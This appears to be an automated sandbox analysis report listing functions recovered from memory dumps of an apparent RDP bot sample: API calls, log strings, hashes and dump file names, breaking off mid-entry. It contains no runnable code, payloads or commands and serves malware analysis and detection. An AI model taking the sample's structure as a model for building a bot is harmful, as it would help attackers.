Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: e575ce4ff6468a7c1a66abed08b257aa28eec3b6b3dac7ce41bb0a83748ca758
Instruction ID: 5c2963500265fe6c254c679b72d2595948b34b2441f9f5ef6d06ffd5cdc0b2b3
Opcode Fuzzy Hash: e575ce4ff6468a7c1a66abed08b257aa28eec3b6b3dac7ce41bb0a83748ca758
Instruction Fuzzy Hash: 1921B558E0DD8FC3FB744A5ABC543B912409F1037AFB085B2D08ECA9F0DEDCA8859642

Function 00007FFE0EB482D7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE0EB482E0
GetLastError.KERNEL32 ref: 00007FFE0EB48325

Strings

fs_path_exists, xrefs: 00007FFE0EB4830B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB48312
(path != NULL), xrefs: 00007FFE0EB48304
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE0EB482FD

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 169187e13bf94e9e73ddb397f1f9595109a157e87271d41c4efa3b22c4cadb2c
Instruction ID: 8db0a3d01ddb741a1eb14746dfa8a1ebc938fd9e29cae1a8fbd0c04163d44b83
Opcode Fuzzy Hash: 169187e13bf94e9e73ddb397f1f9595109a157e87271d41c4efa3b22c4cadb2c
Instruction Fuzzy Hash: 0B21A4D1E0DA8782FB785E98A58437E5150DF01309F604532F68ECA1F5CE6CED85AE4A

Function 00007FF6EF656E87 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00007FF6EF651425), ref: 00007FF6EF656E90
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF6EF651425), ref: 00007FF6EF656ED5

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF656EC2
(path != NULL), xrefs: 00007FF6EF656EB4
fs_path_exists, xrefs: 00007FF6EF656EBB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF656EAD

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: ea079b3803748673d39faf23f7dd07e03a78055bc1dc2658456f28d9101e6ad3
Instruction ID: ad6b978fba39b0c72315146f918efd4c1872bd8eaa03fe1ecc9e412794749127
Opcode Fuzzy Hash: ea079b3803748673d39faf23f7dd07e03a78055bc1dc2658456f28d9101e6ad3
Instruction Fuzzy Hash: A721D552E1E49783FB214658E488379536A5F40309FA14932E00EEA5E2CE1FEC85F24B

Function 00007FFE13382ECA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE13382EF2
WSAGetLastError.WS2_32 ref: 00007FFE13382F0C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE13382F6A
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13382F2D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE13382F45
tcp_recv, xrefs: 00007FFE13382F26, 00007FFE13382F3E, 00007FFE13382F63

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
Instruction ID: 797b1d1afe88a60e45258c91175b7d870fe4e25384927a3eaed8c6276d85ec49
Opcode Fuzzy Hash: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
Instruction Fuzzy Hash: 11114C51A0CE179DE610572BA8516BC1251AF757B4F5003F1E83EFAAF5DF1CA986C308

Function 00007FFE126D1C0A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE126D1C32
WSAGetLastError.WS2_32 ref: 00007FFE126D1C4C

Strings

tcp_recv, xrefs: 00007FFE126D1C66, 00007FFE126D1C7E, 00007FFE126D1CA3
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126D1C6D
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE126D1CAA
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE126D1C85

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 884c80d553fb6549a94c8d8e5a5069de13c464ac09d09463092afce2d5c40c4e
Instruction ID: bdeb56b428121e822ceb38197d04c9f75ffe7360a04212018cf14f1dc813f1f0
Opcode Fuzzy Hash: 884c80d553fb6549a94c8d8e5a5069de13c464ac09d09463092afce2d5c40c4e
Instruction Fuzzy Hash: 69119150E0CE1FC2FB249327AC406B41240AF85BB4F5017F1D86D866F5EEDCA906A300

Function 00007FFE11EC479A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11EC47C2
WSAGetLastError.WS2_32 ref: 00007FFE11EC47DC

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE11EC483A
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11EC47FD
tcp_recv, xrefs: 00007FFE11EC47F6, 00007FFE11EC480E, 00007FFE11EC4833
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11EC4815

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 36230ea898b115dc2fe11161af9f4bde64d57a46b3472181a5d532514b5feed2
Instruction ID: eb7a010bbb520019d240ee4c893c98a6a0ea31901d66a76247ed2fbad77fc4f7
Opcode Fuzzy Hash: 36230ea898b115dc2fe11161af9f4bde64d57a46b3472181a5d532514b5feed2
Instruction Fuzzy Hash: 06119194E1DD5781FB20639BAC403BB1258AF457B4F8423B0D83D4AAF5DE1CB5568300

Function 00007FFE0E16B4BA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0E16B4E2
WSAGetLastError.WS2_32 ref: 00007FFE0E16B4FC

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0E16B55A
tcp_recv, xrefs: 00007FFE0E16B516, 00007FFE0E16B52E, 00007FFE0E16B553
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E16B51D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0E16B535

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 1531048adbcce7d774912a8d9d5e0e06b2ba9bfda505540116f96d030ed67777
Instruction ID: 2abf370108d9cf4a8c8fd01cfad7862729abae0fb2316f1128fc7c0d252b323e
Opcode Fuzzy Hash: 1531048adbcce7d774912a8d9d5e0e06b2ba9bfda505540116f96d030ed67777
Instruction Fuzzy Hash: EA118CA0E0C50791E6216729A844FB81225AF45BB4F441333D8FF8B6F3EF1CA9868340

Function 00007FFE0EB425AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0EB425D2
WSAGetLastError.WS2_32 ref: 00007FFE0EB425EC

Strings

tcp_recv, xrefs: 00007FFE0EB42606, 00007FFE0EB4261E, 00007FFE0EB42643
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EB4260D
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0EB4264A
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0EB42625

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: a204f37957f8cc50f7fb8682c8291a3d1c880997f0210f9337153abe182ed35f
Instruction ID: e11a714e117ad408ef72cc2bcdb5b8046319745876086194784b10fba0e2fef1
Opcode Fuzzy Hash: a204f37957f8cc50f7fb8682c8291a3d1c880997f0210f9337153abe182ed35f
Instruction Fuzzy Hash: 3C119191B0C60761FA30AF54AC503B91240EF447F4F400330E9AD966F5EE1CE506AF00

Function 00007FF6EF652304 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,service,000001FC7A4F13D0,00007FF6EF652910), ref: 00007FF6EF652312

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

GetLastError.KERNEL32(?,?,service,000001FC7A4F13D0,00007FF6EF652910), ref: 00007FF6EF65233E

Strings

module_load, xrefs: 00007FF6EF652326, 00007FF6EF65234A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF6EF652351
service, xrefs: 00007FF6EF652305
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF6EF65232D

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
API String ID: 4085810780-4145076245
Opcode ID: 31b2b52d77e7e7858c6070d5e0cca7dbf1c3275249328b34dc41f372c6276438
Instruction ID: 419a45145d3390099223b699135bc68d46e0df5289704c095398054ef14f9b63
Opcode Fuzzy Hash: 31b2b52d77e7e7858c6070d5e0cca7dbf1c3275249328b34dc41f372c6276438
Instruction Fuzzy Hash: 36F0E252E1A617A3FD10979AF8002B413086F96B84F4A0831EC0DE7762ED1EA586F30A

Function 00007FFE1338328E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE133832A0

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE133832F4
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE133832DF
net_init, xrefs: 00007FFE133832B1, 00007FFE133832D5
Done, xrefs: 00007FFE133832AA
[I] (%s) -> %s, xrefs: 00007FFE133832B8

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
Instruction ID: 3038bb72f34f2785bf82a2ba686d5c8cdbd665b753aed19dc54e9e1f77dfaf2a
Opcode Fuzzy Hash: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
Instruction Fuzzy Hash: B4F09660B08D07CDFB109712E8003F862516F703A4F8401F2D42E6A6B5EE5DF689C708

Function 00007FFE0E1362AE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0E1362C0

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E136314
[I] (%s) -> %s, xrefs: 00007FFE0E1362D8
Done, xrefs: 00007FFE0E1362CA
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0E1362FF
net_init, xrefs: 00007FFE0E1362D1, 00007FFE0E1362F5

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: acff9132394572571e9ead6a7c290dff13286087cde6f82f4a6ecea9baf83ee6
Instruction ID: fee15db58f8e3f8f9d61ee6c6f547e4bef11f350e933af9706e708851df55bac
Opcode Fuzzy Hash: acff9132394572571e9ead6a7c290dff13286087cde6f82f4a6ecea9baf83ee6
Instruction Fuzzy Hash: 4BF03AE0B0D64B91FB119B24E8543F97351EF56388F440037D8CE4A2B6EEADEA99C310

Function 00007FFE126D1FCE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE126D1FE0

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[I] (%s) -> %s, xrefs: 00007FFE126D1FF8
net_init, xrefs: 00007FFE126D1FF1, 00007FFE126D2015
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126D2034
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE126D201F
Done, xrefs: 00007FFE126D1FEA

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 5a447744b40fc6ddb4fce790949040fd6161e5f8a88fd7e75ec027fdea9a4653
Instruction ID: 78d2d34b49c6b8bf3898838704d1245fccb1c15a9c2af1b4e391a1a18bf912db
Opcode Fuzzy Hash: 5a447744b40fc6ddb4fce790949040fd6161e5f8a88fd7e75ec027fdea9a4653
Instruction Fuzzy Hash: 00F06760B18C8B82FF11DB23EC017F52260EF957A4F8404B2C49D4A2F6EE9CE648C740

Function 00007FFE11EC4B5E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE11EC4B70

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE11EC4BAF
Done, xrefs: 00007FFE11EC4B7A
net_init, xrefs: 00007FFE11EC4B81, 00007FFE11EC4BA5
[I] (%s) -> %s, xrefs: 00007FFE11EC4B88
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC4BC4

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: b93122e5c766c1df7d1683d665679da329bd46c519043c3a2403d14143d78ae7
Instruction ID: 124b8a4d3654ca8b8b749daf897177b7f688a224eb552b6d448123d2e47cfd9c
Opcode Fuzzy Hash: b93122e5c766c1df7d1683d665679da329bd46c519043c3a2403d14143d78ae7
Instruction Fuzzy Hash: 14F01DA1B0CD47D1FF109B97EC453F61258AF107A4F8820B6D40E466B5EE5CE9498310

Function 00007FFE0E16B87E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0E16B890

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0E16B8CF
net_init, xrefs: 00007FFE0E16B8A1, 00007FFE0E16B8C5
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16B8E4
Done, xrefs: 00007FFE0E16B89A
[I] (%s) -> %s, xrefs: 00007FFE0E16B8A8

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 67fe9a9e212230c1ac7a02241026cc322f159ac854deddccca5ffee0e1b4d977
Instruction ID: 254dd359ef6b75d1ebd72df660dac250975fd3ec95465a723699a241e78d5f4c
